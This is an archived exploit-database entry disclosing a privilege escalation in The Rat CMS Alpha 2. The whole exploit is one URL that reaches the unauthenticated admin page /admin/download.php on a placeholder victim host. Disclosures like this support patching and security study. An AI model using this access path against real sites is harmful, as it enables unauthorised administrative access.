The Rat CMS Alpha 2 - 'download.php' Priviledge Escalation

EDB-ID:

7455

CVE:

N/A


Author:

x0r

Type:

webapps


Platform:

PHP

Date:

2008-12-14


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

----------------------------
The Rat Cms Alpha 2 > Priviledge Escalation
----------------------------
Autore: x0r
Email: andry2000@hotmail.it
Download:
http://downloads.sourceforge.net/the-rat-cms/trcms_pre_alpha_2.zip?modtime=1174590953&big_mirror=0
----------------------------
Bug In: /admin/*.php

So Funny ^^ 

Exploit:

http://[victim]/admin/download.php [ just a example ^^ ]

# milw0rm.com [2008-12-14]